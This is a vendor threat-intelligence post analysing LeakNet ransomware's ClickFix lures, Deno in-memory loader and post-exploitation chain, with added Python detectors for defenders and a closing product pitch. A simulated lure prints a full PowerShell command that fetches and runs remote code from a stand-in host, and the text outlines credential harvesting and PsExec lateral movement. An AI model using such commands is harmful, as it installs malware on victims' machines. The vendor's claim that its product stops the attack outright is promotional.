LeakNet Ransomware Escalates: ClickFix Lures and Deno In-Memory Loader

LeakNet ransomware now spreads via ClickFix social-engineering lures and a stealthy Deno-based in-memory loader. This analysis covers the attack chain, detection tips, and key IoCs.

Stop LeakNet at Runtime
  • March 18, 2026

Recent investigations show that LeakNet now delivers malicious “ClickFix” prompts via compromised legitimate websites. This social-engineering trick fools users into running a malicious msiexec command, essentially giving the attacker a foothold without stealing credentials.

In parallel, LeakNet is using a novel Deno-based in-memory loader to run payloads, leaving minimal files on disk. Despite the new entry points, every confirmed LeakNet breach follows the same post-exploit steps (DLL sideload, lateral movement, and cloud staging). Defenders can leverage these predictable behaviors for detection and containment.

ClickFix Lures: A “Wide Net” Attack Vector

LeakNet’s new approach casts a wide net over potential victims. Compromised, trusted sites now host fake verification pages, often mimicking Cloudflare or Windows messages, that instruct users to press Win+R and paste a command. This tactic doesn’t target a specific industry or user; any employee who clicks through can trigger the malware.

ClickFix has already surged in popularity: last year, roughly 59% of top malware families used ClickFix-style lures to infect victims. In LeakNet’s case, the lure delivers the Deno-based loader when the user executes the command. This shift lets LeakNet bypass reliance on stolen credentials from initial-access brokers (IABs). Instead of waiting to buy access, the gang directly entices victims via innocent-looking sites.

Deno In-Memory Loader: Stealthy Payload Execution

Once the user runs the initial command, LeakNet rapidly shifts to a low-profile next phase. The attacker installs a legitimate copy of the Deno JavaScript/TypeScript runtime on the victim system and uses it to execute a base64-encoded payload. This “bring your own runtime” technique avoids dropping any suspicious malware file to disk.

Instead, Deno decodes and executes the malicious code directly in memory (the script is passed as a data:application/javascript base64 URL). Since deno.exe is signed and trusted, application allow-listing often lets it run unchecked.

The code executes immediately and:

  • fingerprints the host by gathering the username, hostname, total memory size, operating system type, and similar details;
  • hashes this information to create a unique victim ID;
  • connects to a command-and-control server to retrieve a second-stage payload;
  • enters a polling loop that retrieves new instructions or code from the C2.
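As an added example (not code from the report or from Xcitium), the following Python inspector flags a deno.exe command line whose module argument is an inline base64 data: URL, decodes it, and lists which fingerprinting and C2-style calls the script contains. The watch-lists, file paths and the sample script are constructed assumptions.

```python
import base64
import binascii
import re

# Strings matching the behaviour described for the loader (host fingerprinting,
# C2 fetch, polling loop). Constructed watch-lists, not from the report.
FINGERPRINT_APIS = ("Deno.hostname", "Deno.osRelease", "Deno.systemMemoryInfo",
                    "Deno.build", "Deno.env")
C2_APIS = ("fetch(", "setInterval(", "setTimeout(", "eval(", "import(")
DATA_URL_RE = re.compile(r"^data:([\w/+.-]*)(?:;charset=[\w-]+)?;base64,(.+)$", re.I)

def inspect_deno_cmdline(cmdline: str):
    """Return a finding dict when a deno.exe command line carries an inline
    base64 data: URL as its module, otherwise None."""
    argv = re.findall(r'"[^"]*"|\S+', cmdline)   # keep quoted paths intact
    if not argv or not argv[0].strip('"').lower().endswith("deno.exe"):
        return None
    for arg in argv[1:]:
        m = DATA_URL_RE.match(arg.strip('"'))
        if not m:
            continue
        try:   # decode so the analyst sees the script, not only the blob
            script = base64.b64decode(m.group(2), validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            script = ""        # an undecodable blob is still worth the finding
        return {
            "mime": m.group(1).lower() or "(none)",
            "fingerprint": [a for a in FINGERPRINT_APIS if a in script],
            "c2": [a for a in C2_APIS if a in script],
            "decoded_head": script[:120],
        }
    return None

# Constructed sample: a harmless sketch of the described behaviour, encoded the
# way the loader is invoked. Paths are hypothetical.
SAMPLE_SCRIPT = ('const id = Deno.hostname() + "|" + Deno.osRelease();\n'
                 'setInterval(() => fetch("https://c2.invalid/poll/" + id), 60000);\n')
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode()).decode()
SAMPLE_CMDLINE = (r'"C:\Users\victim\AppData\Local\deno\deno.exe" run --allow-all '
                  f'"data:application/javascript;base64,{SAMPLE_B64}"')
BENIGN_CMDLINE = r'"C:\Program Files\deno\deno.exe" run --allow-net https://deno.land/x/tool/mod.ts'

if __name__ == "__main__":
    print(inspect_deno_cmdline(SAMPLE_CMDLINE))
    print(inspect_deno_cmdline(BENIGN_CMDLINE))
```

Feed it the CommandLine field of process-creation telemetry; a hit with non-empty fingerprint and c2 lists is the pattern the report describes.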

ClickFix Attack: Phishing Simulation

Threat intelligence simulation, “ClickFix: Social Engineering Attack”: analyzing how adversaries use fake browser issues to trick users into executing malicious PowerShell commands. The stages of the embedded walkthrough are summarized below.

STAGE 1: COMPROMISED ASSET

Initial Access: The attacker compromises a legitimate website (WordPress, etc.) and injects a script (in the simulation, /wp-content/js/update.js on a legitimate business site).

Injection: The script triggers a fake “DNS Connection Error” or “Browser Update” overlay to initiate the attack. The simulated script shows the “fix” modal only to Chrome user agents, claiming that Google Chrome cannot display the webpage because of an outdated browser component.

STAGE 2: MALICIOUS INSTRUCTIONS

Social Engineering: The “How to fix” button provides a PowerShell command to be copied and executed manually. The simulated error page tells the user to:

  1. Press Windows Key + R.
  2. Type powershell and press Enter.
  3. Paste the command below and press Enter.

  powershell -ep bypass -w hidden -c "iex(iwr 'http://c2.link/p' -useb)"

Trust: By asking the user to perform the action, attackers bypass automated browser security blocks.

STAGE 3: EXECUTION & DENO

Deno Runtime: The attacker downloads Deno (a legitimate JS runtime) to run malicious TypeScript/JS scripts locally.

In-Memory Payload: The malware is executed directly in memory to evade traditional file-based antivirus scans: deno.exe is fetched silently, the payload is loaded into RAM, and no file is written to disk.

STAGE 4: DATA EXFILTRATION

Stealer Logic: Deno processes extract browser profiles, cookies, and local wallet data (the simulation labels the component an InfoStealer, Vidar variant, collecting passwords, cookies and system information).

C2 Transmission: Data is compressed and sent to attacker-controlled high-rotation domains.

CLICKFIX DEFENSE

Memory Protection: Use EDR tools with memory-scanning capabilities to detect Deno or Node.js runtimes performing suspicious memory operations.

Policy Control: Block unauthorized downloads of binary runtimes (like deno.exe) and restrict PowerShell ‘Invoke-Expression’ (IEX) usage.

Repeated Post-Exploitation Chain

The entry point is ultimately the same with both IAB and ClickFix. The following diagram illustrates the difference between the old broker-based path and the new ClickFix-based path.

In all instances of a LeakNet attack, the group has dropped a malicious jli.dll file into C:\ProgramData\USOShared. The goal is to hijack a legitimate Java process so that it loads their code. This DLL sideloading is difficult to detect because it uses a legitimate, signed executable in a known location.

The next steps in the chain are to gather all available credentials with cmd.exe /c klist, then move laterally with PsExec, using those credentials to execute the malware on other computers. Finally, tools are staged and data is exfiltrated via Amazon S3 buckets, which looks like legitimate network activity.

In short, LeakNet’s playbook is: DLL sideload → Credential harvesting → PsExec lateral movement → S3 staging. Because this chain repeats so reliably, defenders can write behavior-based rules (e.g. detecting a java.exe loading an unexpected DLL or PsExec commands by non-admin users) to catch the attack before encryption.

Key behaviors to watch for include:

  • A Java process loading a jli.dll from an unusual folder (notably USOShared).
  • PsExec usage that is out of line with normal admin activity (e.g. on workstations or by non-privileged accounts).
  • Unusual outbound traffic to cloud storage (AWS S3) or to known attacker-controlled domains, beyond typical business usage.

Defense and Detection Strategies

To defend against LeakNet, we need multiple layers of hardening:

  • Network: block known malicious domains, especially newly observed ones used for C2 and payload delivery, and monitor DNS for unusual activity.
  • Endpoints: restrict tooling, e.g., block standard users from executing the Run command (Win+R) to stop copy-pasted commands, and restrict PsExec to admin users only via Group Policy.

More generally, we should focus on behavioral rather than signature-based detection. Examples include browser/WP processes spawning msiexec and Deno processes launched with a data: URL. Making these policies more restrictive limits LeakNet’s capabilities, forcing the group to rely on even less stealthy techniques.
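The key behaviors listed in the previous section (jli.dll loaded from USOShared, PsExec outside normal admin activity, unbaselined S3 traffic) and the msiexec parent-child example here translate into simple rules. Below is an added Python sketch, not the report's or Xcitium's code, that evaluates constructed Sysmon-style events against those rules; the host naming convention, admin allow-list, expected Java directories and S3 baseline are all assumptions.

```python
from dataclasses import dataclass

# Sysmon-style telemetry reduced to the fields the rules need (constructed records).
@dataclass
class Event:
    kind: str            # "process", "imageload" or "network"
    host: str
    user: str
    image: str = ""      # process image path
    parent: str = ""     # parent image path (process events)
    loaded: str = ""     # DLL path (imageload events)
    dest: str = ""       # destination host (network events)

# Site-specific baselines; every value here is an assumption for the example.
WORKSTATION_PREFIX = "WS-"
ADMIN_USERS = {"CORP\\admin.jane", "CORP\\svc-deploy"}
EXPECTED_JAVA_DIRS = ("c:\\program files\\java\\", "c:\\program files (x86)\\java\\")
S3_BASELINE = {"corpbackup.s3.us-east-1.amazonaws.com"}
CLICKFIX_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}

def _name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def evaluate(ev: Event) -> list:
    hits = []   # names of every behavioural rule the event trips
    if (ev.kind == "imageload" and _name(ev.image) == "java.exe"
            and _name(ev.loaded) == "jli.dll"
            and not ev.loaded.lower().startswith(EXPECTED_JAVA_DIRS)):
        hits.append("jli_sideload")      # java.exe pulling jli.dll from an odd folder
    if (ev.kind == "process" and _name(ev.image) in {"psexec.exe", "psexesvc.exe"}
            and (ev.host.startswith(WORKSTATION_PREFIX) or ev.user not in ADMIN_USERS)):
        hits.append("psexec_out_of_baseline")
    if (ev.kind == "process" and _name(ev.image) == "msiexec.exe"
            and _name(ev.parent) in CLICKFIX_PARENTS):
        hits.append("clickfix_msiexec")  # Win+R (explorer) or browser launched msiexec
    if (ev.kind == "network" and ev.dest.endswith(".amazonaws.com")
            and ev.dest not in S3_BASELINE):
        hits.append("unbaselined_s3")
    return hits

SAMPLE_EVENTS = [  # one true positive per rule plus a benign Java load (second entry)
    Event("imageload", "WS-1042", "CORP\\jdoe", r"C:\Program Files\Java\jre\bin\java.exe",
          loaded=r"C:\ProgramData\USOShared\jli.dll"),
    Event("imageload", "WS-1042", "CORP\\jdoe", r"C:\Program Files\Java\jre\bin\java.exe",
          loaded=r"C:\Program Files\Java\jre\bin\jli.dll"),
    Event("process", "WS-1042", "CORP\\jdoe", r"C:\Users\jdoe\Downloads\PsExec.exe"),
    Event("process", "WS-1042", "CORP\\jdoe", r"C:\Windows\System32\msiexec.exe",
          parent=r"C:\Windows\explorer.exe"),
    Event("network", "WS-1042", "CORP\\jdoe", dest="exfil-example.s3.us-east-1.amazonaws.com"),
]
```

Running evaluate over SAMPLE_EVENTS trips exactly one rule for each of the four attack-chain events and none for the legitimate Java load.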

Indicators of Compromise (IoCs)

The following domains and IPs have been observed by Xcitium Threat Labs in ClickFix/Deno attacks and LeakNet intrusions:


Maintaining up-to-date blocklists and network monitoring for these IoCs can provide early warning of LeakNet attacks. By combining this with behavioral detections, organizations have their best chance to intercept the intrusion before ransomware hits.

Conclusion: LeakNet Proves Ransomware No Longer Waits for Stolen Access

LeakNet’s new ClickFix and Deno chain shows how quickly modern ransomware crews adapt when old access models slow down. Instead of waiting for brokers to sell credentials, the group now persuades users to launch the first stage themselves, then moves immediately into an in-memory loader, DLL sideloading, credential harvesting, lateral movement, and cloud staging. The delivery changed, but the outcome did not: rapid operational compromise followed by ransomware pressure.

Why This Threat Scales So Easily

This campaign succeeds because it combines human trust with stealthy execution.

  • Compromised legitimate sites host fake verification pages that instruct users to paste malicious commands.
  • A signed Deno runtime is used to execute base64 payloads directly in memory, reducing file-based visibility.
  • The post-exploitation chain is highly repeatable: DLL sideload, credential harvesting, PsExec lateral movement, then S3 staging.

Once that chain starts, defenders are racing a process designed for speed.

Where Xcitium Changes the Outcome

If you have Xcitium, this attack would NOT succeed.

With Xcitium Advanced EDR, LeakNet fails at execution.

  • The malicious runtime chain is intercepted the moment it begins.
  • Deno, Java sideloading, and follow-on payloads may attempt to run, but they run without being able to cause damage.
  • Credential harvesting, lateral movement, and ransomware deployment never become operational.

The attacker loses because the first stage never becomes real system impact.

Stop the First Stage, Stop the Ransomware

LeakNet proves that modern ransomware does not need stolen passwords to win. It only needs one user to execute the first command. Reduce that chance with stronger user discipline, then enforce execution-time protection so the rest of the chain never matters.
